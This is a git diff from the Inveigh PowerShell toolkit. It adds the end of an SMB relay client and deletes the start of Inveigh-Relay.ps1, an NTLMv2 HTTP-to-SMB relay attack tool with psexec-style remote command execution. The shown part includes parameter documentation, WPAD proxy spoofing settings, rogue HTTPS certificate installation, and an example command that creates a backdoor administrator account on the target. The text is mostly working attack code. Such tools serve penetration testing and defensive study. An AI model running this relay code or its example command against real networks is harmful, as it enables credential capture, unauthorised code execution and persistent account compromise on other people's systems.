+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($session_string -and !$Logoff)
+ {
+ $SMB_client_stage = 'Exit'
+ }
+ else
+ {
+ $SMB_client_stage = 'Logoff'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ }
+
+ if($SMBExec_failed)
+ {
+ BREAK SMB_execute_loop
+ }
+
+ }
+
+ }
+
+ }
+
+ if($session_string -and $Inveigh)
+ {
+ $inveigh.session_lock_table[$session] = 'open'
+ $inveigh.session_message_ID_table[$session] = $SMB2_message_ID
+ $inveigh.session_list[$session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ }
+
+ if(!$session_string -or $Logoff)
+ {
+ $SMB_client.Close()
+ $SMB_client_stream.Close()
+ }
+
+}
+
+} \ No newline at end of file
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
deleted file mode 100644
index b7bd457..0000000
--- a/Scripts/Inveigh-Relay.ps1
+++ /dev/null
@@ -1,4516 +0,0 @@
-function Invoke-InveighRelay
-{
-<#
-.SYNOPSIS
-Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution.
-
-.DESCRIPTION
-Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexec style command execution.
-
- HTTP/HTTPS to SMB NTLMv2 relay with granular control
- Supports SMB1 and SMB2 targets
- Does not require priveleged access on the Invoke-InveighRelay host
- The Invoke-InveighRelay host can be targeted for privilege escalation
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
- Granular control of console and file output
-
-.PARAMETER Challenge
-Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
-challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
-pulled from the SMB relay target.
-
-.PARAMETER Command
-Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-
-.PARAMETER ConsoleOutput
-Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a
-shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-
-.PARAMETER ConsoleQueueLimit
-Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
-
-.PARAMETER ConsoleStatus
-(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
-displaying full capture lists when running through a shell that does not have access to the support functions.
-
-.PARAMETER ConsoleUnique
-Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
-and username combinations when real time console output is enabled.
-
-.PARAMETER FileOutput
-Default = Disabled: (Y/N) Enable/Disable real time file output.
-
-.PARAMETER FileOutputDirectory
-Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
-enabled.
-
-.PARAMETER HTTP
-Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-
-.PARAMETER HTTPIP
-Default = Any: IP address for the HTTP/HTTPS listener.
-
-.PARAMETER HTTPPort
-Default = 80: TCP port for the HTTP listener.
-
-.PARAMETER HTTPS
-Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
-the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
-local administrator access.
-
-.PARAMETER HTTPSPort
-Default = 443: TCP port for the HTTPS listener.
-
-.PARAMETER HTTPSCertIssuer
-Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
-
-.PARAMETER HTTPSCertSubject
-Default = localhost: The subject field for the cert that will be installed for HTTPS.
-
-.PARAMETER HTTPSForceCertDelete
-Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and
-HTTPSCertSubject.
-
-.PARAMETER HTTPResetDelay
-Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
-will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the
-chance of capturing/relaying authentication through a popup box with some browsers (Firefox).
-
-.PARAMETER HTTPResetDelayTimeout
-Default = 30 Seconds: HTTPResetDelay timeout in seconds.
-
-.PARAMETER LogOutput
-Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
-
-.PARAMETER MachineAccounts
-Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-
-.PARAMETER OutputStreamOnly
-Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
-running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
-various yellow warning messages if enabled.
-
-.PARAMETER ProxyRelay
-Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication.
-
-.PARAMETER ProxyIP
-Default = Any: IP address for the proxy listener.
-
-.PARAMETER ProxyPort
-Default = 8182: TCP port for the proxy listener.
-
-.PARAMETER ProxyIgnore
-Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
-will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
-with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
-cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
--SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
-closing and reopening.
-
-.PARAMETER RelayAutoDisable
-Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
-target.
-
-.PARAMETER RelayAutoExit
-Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
-
-.PARAMETER RunTime
-(Integer) Run time duration in minutes.
-
-.PARAMETER Service
-Default = 20 Character Random: Name of the service to create and delete on the target.
-
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-
-.PARAMETER SMB1
-(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
-target.
-
-.PARAMETER StartupChecks
-Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
-
-.PARAMETER StatusOutput
-Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
-
-.PARAMETER Target
-IP address of system to target for SMB relay.
-
-.PARAMETER Tool
-Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
-PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
-0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
-
-.PARAMETER Usernames
-Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
-domain\username format.
-
-.PARAMETER WPADAuth
-Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
-Anonymous can prevent browser login prompts.
-
-.PARAMETER WPADAuthIgnore
-Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
-will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
-popups for authenticated wpad.dat requests such as Firefox.
-
-.EXAMPLE
-Invoke-Inveigh -HTTP N
-Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-# Parameter default values can be modified in this section:
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
- [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
- [parameter(Mandatory=$false)][Array]$Usernames = "",
- [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
- [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
- [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
- [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
- [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
- [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
- [parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
- [parameter(Mandatory=$false)][Int]$RunTime = "",
- [parameter(Mandatory=$true)][String]$Command = "",
- [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
- [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
- [parameter(Mandatory=$false)][String]$Service,
- [parameter(Mandatory=$true)][String]$Target = "",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
- [parameter(Mandatory=$false)][Switch]$SMB1,
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- Write-Output "Error:$($invalid_parameter) is not a valid parameter."
- throw
-}
-
-$inveigh_version = "1.3"
-
-if($ProxyIP -eq '0.0.0.0')
-{
- $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-if(!$FileOutputDirectory)
-{
- $output_directory = $PWD.Path
-}
-else
-{
- $output_directory = $FileOutputDirectory
-}
-
-if(!$inveigh)
-{
- $global:inveigh = [HashTable]::Synchronized(@{})
- $inveigh.cleartext_list = New-Object System.Collections.ArrayList
- $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
- $inveigh.log = New-Object System.Collections.ArrayList
- $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
- $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
- $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
- $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
- $inveigh.POST_request_list = New-Object System.Collections.ArrayList
- $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
- $inveigh.valid_host_list = New-Object System.Collections.ArrayList
-}
-
-if($inveigh.relay_running)
-{
- Write-Output "Error:Invoke-InveighRelay is already running, use Stop-Inveigh"
- throw
-}
-
-if(!$inveigh.running)
-{
- $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
- $inveigh.console_queue = New-Object System.Collections.ArrayList
- $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.log_file_queue = New-Object System.Collections.ArrayList
- $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
- $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
- $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
- $inveigh.status_queue = New-Object System.Collections.ArrayList
- $inveigh.console_input = $true
- $inveigh.console_output = $false
- $inveigh.file_output = $false
- $inveigh.HTTPS_existing_certificate = $false
- $inveigh.HTTPS_force_certificate_delete = $false
- $inveigh.log_output = $true
- $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
- $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
- $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
- $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
- $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
-}
-
-if($StartupChecks -eq 'Y')
-{
-
- $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
-
- if($HTTP -eq 'Y')
- {
- $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
- }
-
- if($HTTPS -eq 'Y')
- {
- $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
- }
-
- if($Proxy -eq 'Y')
- {
- $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
- }
-
-}
-
-$inveigh.relay_running = $true
-$inveigh.SMB_relay = $true
-
-if($StatusOutput -eq 'Y')
-{
- $inveigh.status_output = $true
-}
-else
-{
- $inveigh.status_output = $false
-}
-
-if($OutputStreamOnly -eq 'Y')
-{
- $inveigh.output_stream_only = $true
-}
-else
-{
- $inveigh.output_stream_only = $false
-}
-
-if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
-{
- $inveigh.tool = 1
- $inveigh.output_stream_only = $true
- $inveigh.newline = ""
- $ConsoleOutput = "N"
-}
-elseif($Tool -eq 2) # PowerShell Empire
-{
- $inveigh.tool = 2
- $inveigh.output_stream_only = $true
- $inveigh.console_input = $false
- $inveigh.newline = "`n"
- $LogOutput = "N"
- $ShowHelp = "N"
-
- switch ($ConsoleOutput)
- {
-
- 'Low'
- {
- $ConsoleOutput = "Low"
- }
-
- 'Medium'
- {
- $ConsoleOutput = "Medium"
- }
-
- default
- {
- $ConsoleOutput = "Y"
- }
-
- }
-
-}
-else
-{
- $inveigh.tool = 0
- $inveigh.newline = ""
-}
-
-# Write startup messages
-$inveigh.status_queue.Add("Inveigh Relay $inveigh_version started at $(Get-Date -format 's')") > $null
-
-if($FileOutput -eq 'Y')
-{
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay $inveigh_version started") > $null
-}
-
-if($LogOutput -eq 'Y')
-{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay started") > $null
- $inveigh.log_output = $true
-}
-else
-{
- $inveigh.log_output = $false
-}
-
-if($firewall_status)
-{
- $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
-
- $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
- $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
-
- if($firewall_powershell)
- {
- $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
- }
-
-}
-
-if($HTTP -eq 'Y')
-{
-
- if($HTTP_port_check)
- {
- $HTTP = "N"
- $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
- }
- else
- {
- $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null
-
- if($HTTPIP)
- {
- $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null
- }
-
- if($HTTPPort -ne 80)
- {
- $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
- }
- }
-
-}
-else
-{
- $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null
-}
-
-if($HTTPS -eq 'Y')
-{
-
- if($HTTPS_port_check)
- {
- $HTTPS = "N"
- $inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null
- }
- else
- {
-
- try
- {
- $inveigh.certificate_issuer = $HTTPSCertIssuer
- $inveigh.certificate_CN = $HTTPSCertSubject
- $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
- $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
- $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
-
- if(!$certificate_check)
- {
- # credit to subTee for cert creation code https://github.com/subTee/Interceptor
- $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
- $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
- $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
- $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
- $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
- $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
- $certificate_key.KeySpec = 2
- $certificate_key.Length = 2048
- $certificate_key.MachineContext = 1
- $certificate_key.Create()
- $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
- $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
- $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
- $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
- $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
- $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
- $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
- $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
- $certificate.Subject = $certificate_distinguished_name
- $certificate.Issuer = $certificate_issuer_distinguished_name
- $certificate.NotBefore = (get-date).AddDays(-271)
- $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
- $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
- $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
- $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
- $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
- $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
- $certificate_basic_constraints.InitializeEncode("true",1)
- $certificate.X509Extensions.Add($certificate_basic_constraints)
- $certificate.Encode()
- $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
- $certificate_enrollment.InitializeFromRequest($certificate)
- $certificate_data = $certificate_enrollment.CreateRequest(0)
- $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
- $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
- $inveigh.HTTPS = $true
- $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null
- }
- else
- {
-
- if($HTTPSForceCertDelete -eq 'Y')
- {
- $inveigh.HTTPS_force_certificate_delete = $true
- }
-
- $inveigh.HTTPS_existing_certificate = $true
- $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
- }
-
- }
- catch
- {
- $HTTPS = "N"
- $inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Error") > $null
- }
-
- }
-
-}
-else
-{
- $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null
-}
-
-if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
-{
-
- if($Challenge)
- {
- $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
- }
-
- if($MachineAccounts -eq 'N')
- {
- $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
- $inveigh.machine_accounts = $false
- }
- else
- {
- $inveigh.machine_accounts = $true
- }
-
- $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
-
- if($WPADAuth -eq "NTLM")
- {
- $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()})
-
- if($WPADAuthIgnore.Count -gt 0)
- {
- $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
- }
-
- }
-
- $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
-
- if($HTTPResetDelay.Count -gt 0)
- {
- $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
- $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
- }
-
-}
-
-if($Proxy -eq 'Y')
-{
-
- if($proxy_port_check)
- {
- $HTTP = "N"
- $inveigh.status_queue.Add("Proxy Capture/Relay Disabled Due To In Use Port $ProxyPort") > $null
- }
- else
- {
- $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
- $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
- $ProxyPortFailover = $ProxyPort + 1
- $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}"
- $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
-
- if($ProxyIgnore.Count -gt 0)
- {
- $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
- }
-
- }
-
-}
-
-$inveigh.status_queue.Add("Relay Target = $Target") > $null
-
-if($Usernames)
-{
-
- if($Usernames.Count -eq 1)
- {
- $inveigh.status_queue.Add("Relay Username = " + ($Usernames -join ",")) > $null
- }
- else
- {
- $inveigh.status_queue.Add("Relay Usernames = " + ($Usernames -join ",")) > $null
- }
-
-}
-
-if($RelayAutoDisable -eq 'Y')
-{
- $inveigh.status_queue.Add("Relay Auto Disable = Enabled") > $null
-}
-else
-{
- $inveigh.status_queue.Add("Relay Auto Disable = Disabled") > $null
-}
-
-if($RelayAutoExit -eq 'Y')
-{
- $inveigh.status_queue.Add("Relay Auto Exit = Enabled") > $null
-}
-else
-{
- $inveigh.status_queue.Add("Relay Auto Exit = Disabled") > $null
-}
-
-if($Service)
-{
- $inveigh.status_queue.Add("Relay Service = $Service") > $null
-}
-
-if($SMB1)
-{
- $inveigh.status_queue.Add("SMB Version = SMB1") > $null
- $SMB_version = 'SMB1'
-}
-
-if($ConsoleOutput -ne 'N')
-{
-
- if($ConsoleOutput -eq 'Y')
- {
- $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
- }
- else
- {
- $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null
- }
-
- $inveigh.console_output = $true
-
- if($ConsoleStatus -eq 1)
- {
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null
- }
- elseif($ConsoleStatus -gt 1)
- {
- $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null
- }
-
-}
-else
-{
-
- if($inveigh.tool -eq 1)
- {
- $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
- }
- else
- {
- $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
- }
-
-}
-
-if($ConsoleUnique -eq 'Y')
-{
- $inveigh.console_unique = $true
-}
-else
-{
- $inveigh.console_unique = $false
-}
-
-if($FileOutput -eq 'Y')
-{
- $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
- $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
- $inveigh.file_output = $true
-}
-else
-{
- $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
-}
-
-if($RunTime -eq 1)
-{
- $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
-}
-elseif($RunTime -gt 1)
-{
- $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
-}
-
-if($ShowHelp -eq 'Y')
-{
- $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null
-
- if($inveigh.console_output)
- {
- $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
- }
-
-}
-
-if($inveigh.status_output)
-{
-
- while($inveigh.status_queue.Count -gt 0)
- {
-
- switch -Wildcard ($inveigh.status_queue[0])
- {
-
- {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh-Relay" -or $_ -like "Windows Firewall = Enabled"}
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Warning($inveigh.status_queue[0])
- }
-
- $inveigh.status_queue.RemoveAt(0)
- }
-
- default
- {
-
- if($inveigh.output_stream_only)
- {
- Write-Output($inveigh.status_queue[0] + $inveigh.newline)
- }
- else
- {
- Write-Output($inveigh.status_queue[0])
- }
-
- $inveigh.status_queue.RemoveAt(0)
- }
-
- }
-
- }
-
-}
-
-$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
-$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
-$process_ID = $process_ID -replace "-00-00",""
-[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-# Begin ScriptBlocks
-
-# Shared Basic Functions ScriptBlock
-$shared_basic_functions_scriptblock =
-{
-
- function DataLength2
- {
- param ([Int]$length_start,[Byte[]]$string_extract_data)
-
- $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
- return $string_length
- }
-
- function DataLength4
- {
- param ([Int]$length_start,[Byte[]]$string_extract_data)
-
- $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
- return $string_length
- }
-
- function DataToString
- {
- param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
-
- $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
- $string_data = $string_data -replace "-00",""
- $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
- return $string_extract
- }
-
-}
-
-# Irkin Functions ScriptBlock
-$irkin_functions_scriptblock =
-{
- function ConvertFrom-PacketOrderedDictionary
- {
- param($packet_ordered_dictionary)
-
- ForEach($field in $packet_ordered_dictionary.Values)
- {
- $byte_array += $field
- }
-
- return $byte_array
- }
-
- #NetBIOS
-
- function Get-PacketNetBIOSSessionService()
- {
- param([Int]$packet_header_length,[Int]$packet_data_length)
-
- [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
- $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
-
